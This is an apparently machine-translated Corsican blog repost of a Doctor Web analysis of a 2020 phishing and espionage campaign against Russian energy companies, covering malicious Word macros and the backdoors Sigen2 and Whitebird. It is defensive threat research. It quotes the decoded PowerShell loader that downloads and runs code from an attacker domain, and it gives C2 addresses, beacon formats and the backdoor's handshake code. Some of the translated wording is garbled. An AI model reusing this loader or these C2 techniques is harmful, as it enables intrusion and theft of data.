ProHoster > Blog > Amministrazione > Avemu investigatu un attaccu spia miratu à u cumplessu di carburante è energia russu

Avemu investigatu un attaccu spia miratu à u cumplessu di carburante è energia russu

Avemu investigatu un attaccu spia miratu à u cumplessu di carburante è energia russu

A nostra sperienza in l'investigazione di incidenti di sicurezza di l'informatica mostra chì l'email hè sempre unu di i canali più cumuni utilizati da l'attaccanti per penetrà inizialmente in infrastrutture di rete attaccate. Una azione trascurata cù una lettera sospetta (o micca cusì sospetta) diventa un puntu d'entrata per più infezzione, per quessa chì i cibercriminali utilizanu attivamente metudi di ingegneria suciale, anche se cù diversi gradi di successu.

In questu post vulemu parlà di a nostra recente investigazione in una campagna di spam destinata à una quantità di imprese in u cumplessu di carburante è energia russu. Tutti l'attacchi anu seguitu u listessu scenariu cù e-mail falsi, è nimu paria avè fattu assai sforzu in u cuntenutu di testu di questi email.

serviziu di intelligenza

Tuttu hà cuminciatu à a fine d'aprile 2020, quandu l'analista di virus Doctor Web hà rilevatu una campagna di spam in quale i pirate anu mandatu un annuariu telefonicu aghjurnatu à l'impiegati di parechje imprese in u cumplessu russu di carburante è energia. Di sicuru, questu ùn era micca una manifestazione simplice di preoccupazione, postu chì u repertoriu ùn era micca veru, è i ducumenti .docx scaricavanu duie imagine da risorse remoti.

Unu d'elli hè statu telecaricatu à l'urdinatore di l'utilizatori da u servitore news[.]zannews[.]com. Hè nutate chì u nome di duminiu hè simile à u duminiu di u centru media anti-corruption di Kazakhstan - zannews[.]kz. Per d 'altra banda, u duminiu utilizatu era immediatamente reminiscente di una altra campagna di 2015 cunnisciuta cum'è TOPNEWS, chì usava una backdoor ICEFOG è hà avutu domini di cuntrollu di Troia cù a substringa "notizia" in i so nomi. Un'altra funzione interessante era chì quandu si mandava e-mail à diversi destinatari, e dumande per scaricà una maghjina anu utilizatu diversi parametri di dumanda o nomi d'imaghjini unichi.

Cridemu chì questu hè statu fattu per u scopu di cullà l'infurmazioni per identificà un destinatariu "affidabile", chì dopu esse garantitu per apre a lettera à u mumentu propiu. U protocolu SMB hè stata utilizata per scaricà l'imaghjini da u sicondu servitore, chì puderia esse fattu per cullà NetNTLM hashes da l'urdinatori di l'impiegati chì anu apertu u documentu ricevutu.

È quì hè a lettera stessa cù u cartulare falsu:

Avemu investigatu un attaccu spia miratu à u cumplessu di carburante è energia russu

In u ghjugnu di questu annu, i pirate anu cuminciatu à utilizà un novu nome di dominiu, sports[.]manhajnews[.]com, per carica l'imaghjini. L'analisi hà dimustratu chì i sottodomini manhajnews[.]com sò stati utilizati in i mailing spam da almenu settembre 2019. Unu di i scopi di sta campagna era una grande università russa.

Inoltre, à u ghjugnu, l'urganizatori di l'attaccu sò stati cun un novu testu per e so lettere: sta volta u documentu cuntene infurmazione nantu à u sviluppu di l'industria. U testu di a lettera indicò chjaramente chì u so autore ùn era micca un parlante nativu di u russu, o deliberatamente creava una tale impressione nantu à ellu stessu. Sfurtunatamente, l'idee di u sviluppu di l'industria, cum'è sempre, sò diventati solu una copertina - u documentu hà scaricatu novu dui imagine, mentre chì u servitore hè cambiatu per scaricà [.]inklingpaper[.]com.

A prossima innuvazione seguita in lugliu. In un tentativu di scaccià a rilevazione di documenti maliziusi da i prugrammi antivirus, l'attaccanti cuminciaru à aduprà documenti Microsoft Word criptati cù una password. À u listessu tempu, l'attaccanti anu decisu di utilizà una tecnica classica di l'ingegneria suciale - notificazione di ricumpensa.

Avemu investigatu un attaccu spia miratu à u cumplessu di carburante è energia russu

U testu di l'appellu hè statu novu scrittu in u listessu stile, chì hà suscitatu suspetti supplementari trà u destinatariu. U servitore per scaricà l'imaghjini ùn hà micca cambiatu ancu.

Nota chì in tutti i casi, i mailboxi elettronichi arregistrati nantu à i duminii mail[.]ru è yandex[.]ru sò stati utilizati per mandà lettere.

Attaccu

À principiu di settembre 2020, era u tempu d'azzione. I nostri analisti di virus anu registratu una nova onda di attacchi, in quale l'attaccanti anu mandatu di novu lettere sottu u pretestu di aghjurnà un annuariu telefuninu. Tuttavia, sta volta l'attache cuntene una macro maliciosa.

Quandu apre u documentu attaccatu, a macro hà creatu dui schedari:

  • Script VBS %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, chì era destinatu à lancià un schedariu batch;
  • U schedariu batch stessu %APPDATA%configstest.bat, chì hè stata obfuscata.

Avemu investigatu un attaccu spia miratu à u cumplessu di carburante è energia russu

L'essenza di u so travagliu vene à lancià a cunchiglia Powershell cù certi paràmetri. I paràmetri passati à a cunchiglia sò decodificati in cumandamenti:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;

Comu seguita da i cumandamenti presentati, u duminiu da quale a carica hè telecaricata hè torna disguised cum'è un situ di nutizie. Un simplice caricatore, chì u so solu compitu hè di riceve shellcode da u servitore di cumanda è cuntrollu è eseguisce. Pudemu identificà dui tipi di backdoors chì ponu esse installati in u PC di a vittima.

BackDoor.Sigen2.3238

U primu hè BackDoor.Sigen2.3238 - i nostri specialisti ùn avianu micca scontru prima, è ùn ci era ancu micca menzioni di stu prugramma da altri venditori di antivirus.

Stu prugramma hè un backdoor scrittu in C++ è in esecuzione in sistemi operativi Windows 32-bit.

BackDoor.Sigen2.3238 hè capace di cumunicà cù u servitore di gestione cù dui protokolli: HTTP è HTTPS. A mostra testata usa u protocolu HTTPS. U seguente User-Agent hè utilizatu in e dumande à u servitore:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)

In questu casu, tutte e dumande sò furnite cù i seguenti parametri:

%s;type=%s;length=%s;realdata=%send

induve ogni linea %s hè rimpiazzata in corrispondenza da:

  • ID di l'urdinatore infettatu,
  • tipu di dumanda esse mandata,
  • lunghezza di dati in u campu di realdata,
  • i dati.

In u stadiu di cullizzioni di l'infurmazioni nantu à u sistema infettatu, u backdoor genera una linea cum'è:

lan=%s;cmpname=%s;username=%s;version=%s;

induve lan hè l'indirizzu IP di l'urdinatore infettatu, cmpname hè u nome di l'urdinatore, u nome d'utilizatore hè u nome d'utilizatore, a versione hè a linea 0.0.4.03.

Questa infurmazione cù l'identificatore sysinfo hè mandatu via una dumanda POST à ​​u servitore di cuntrollu situatu in https[:]//31.214[.]157.14/log.txt. Se in risposta BackDoor.Sigen2.3238 riceve u signale HEART, a cunnessione hè cunsiderata successu, è u backdoor principia u ciculu principale di cumunicazione cù u servitore.

Descrizzione più cumpleta di i principii operativi BackDoor.Sigen2.3238 hè in u nostru biblioteca di virus.

BackDoor.Whitebird.23

U sicondu prugramma hè una mudificazione di u backdoor BackDoor.Whitebird, digià cunnisciutu da l'incidentu cù una agenza di guvernu in Kazakhstan. Questa versione hè scritta in C ++ è hè pensata per eseguisce in i sistemi operativi Windows 32-bit è 64-bit.

Cum'è a maiò parte di i prugrammi di stu tipu, BackDoor.Whitebird.23 cuncepitu per stabilisce una cunnessione criptata cù u servitore di cuntrollu è u cuntrollu micca autorizatu di un computer infettatu. Installatu in un sistema cumprumissu cù un dropper BackDoor.Sigen2.3244.

U campione chì avemu esaminatu era una libreria maliciosa cù duie esportazioni:

  • Google Play
  • Test.

À u principiu di u so travagliu, decrypts a cunfigurazione hardwired in u corpu di backdoor utilizendu un algoritmu basatu annantu à l'operazione XOR cù byte 0x99. A cunfigurazione s'assumiglia à:


struct st_cfg
{
  _DWORD dword0;
  wchar_t campaign[64];
  wchar_t cnc_addr[256];
  _DWORD cnc_port;
  wchar_t cnc_addr2[100];
  wchar_t cnc_addr3[100];
  _BYTE working_hours[1440];
  wchar_t proxy_domain[50];
  _DWORD proxy_port;
  _DWORD proxy_type;
  _DWORD use_proxy;
  _BYTE proxy_login[50];
  _BYTE proxy_password[50];
  _BYTE gapa8c[256];
};

Per assicurà u so funziunamentu constante, a backdoor cambia u valore specificatu in u campu ore di travagliu cunfigurazioni. U campu cuntene 1440 bytes, chì piglianu i valori 0 o 1 è rapprisentanu ogni minutu di ogni ora in u ghjornu. Crea un filu separatu per ogni interfaccia di rete chì ascolta l'interfaccia è cerca i pacchetti d'autorizazione in u servitore proxy da l'urdinatore infettatu. Quandu un tali pacchettu hè rilevatu, u backdoor aghjunghje infurmazioni nantu à u servitore proxy à a so lista. Inoltre, verifica a presenza di un proxy via WinAPI InternetQueryOptionW.

U prugramma cuntrolla u minutu è l'ora attuale è paraguna cù i dati in u campu ore di travagliu cunfigurazioni. Se u valore per u minutu currispondente di u ghjornu ùn hè micca cero, allura una cunnessione hè stabilita cù u servitore di cuntrollu.

Stabbilimentu di una cunnessione à u servitore simula a creazione di una cunnessione cù u protocolu TLS versione 1.0 trà u cliente è u servitore. U corpu di u backdoor cuntene dui buffers.

U primu buffer cuntene u pacchettu TLS 1.0 Client Hello.

Avemu investigatu un attaccu spia miratu à u cumplessu di carburante è energia russu

U sicondu buffer cuntene TLS 1.0 Client Key Exchange packets cù una lunghezza chjave di 0x100 bytes, Change Cipher Spec, Encrypted Handshake Message.

Avemu investigatu un attaccu spia miratu à u cumplessu di carburante è energia russu

Quandu invià un pacchettu Client Hello, u backdoor scrive 4 bytes di l'ora attuale è 28 bytes di dati pseudo-aleatoriu in u campu Client Random, calculatu cusì:


v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
  *(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
  clientrnd[j] ^= 7 * (_BYTE)j;

U pacchettu ricevutu hè mandatu à u servitore di cuntrollu. A risposta (Server Hello packet) verifica:

  • rispettu di u protocolu TLS versione 1.0;
  • currispundenza di u timestamp (i primi 4 bytes di u campu di pacchettu Random Data) specificatu da u cliente à u timestamp specificatu da u servitore;
  • match of the first 4 bytes after the timestamp in the Random Data field of the client and server.

In casu di e partite specificate, a backdoor prepara un pacchettu di Client Key Exchange. Per fà questu, mudifica a Chjave Pùbblica in u pacchettu di Scambiu di Chjave di Cliente, è ancu l'Encryption IV and Encryption Data in u pacchettu Encrypted Handshake Message.

U backdoor riceve u pacchettu da u servitore di cumanda è cuntrollu, verifica chì a versione di u protocolu TLS hè 1.0, è poi accetta un altru 54 byte (u corpu di u pacchettu). Questu cumpleta a stallazione di cunnessione.

Descrizzione più cumpleta di i principii operativi BackDoor.Whitebird.23 hè in u nostru biblioteca di virus.

Cunclusioni è cunclusioni

L'analisi di documenti, malware, è l'infrastruttura utilizata ci permette di dì cun fiducia chì l'attaccu hè statu preparatu da unu di i gruppi APT Chinese. Cunsiderendu a funziunalità di backdoors chì sò stallati nantu à l'urdinatori di e vittime in casu di un attaccu successu, l'infezzione porta, à u minimu, à u furtu di l'infurmazioni cunfidenziale da l'urdinatori di l'urganisazioni attaccati.

Inoltre, un scenariu assai prubabile hè a stallazione di troiani specializati in servitori lucali cù una funzione speciale. Questi puderanu esse cuntrolli di duminiu, servitori di mail, gateway Internet, etc. Cumu pudemu vede in l'esempiu incidente in Kazakhstan, tali servitori sò d'interessu particulari à l'attaccanti per diversi motivi.

Source: www.habr.com

Add a comment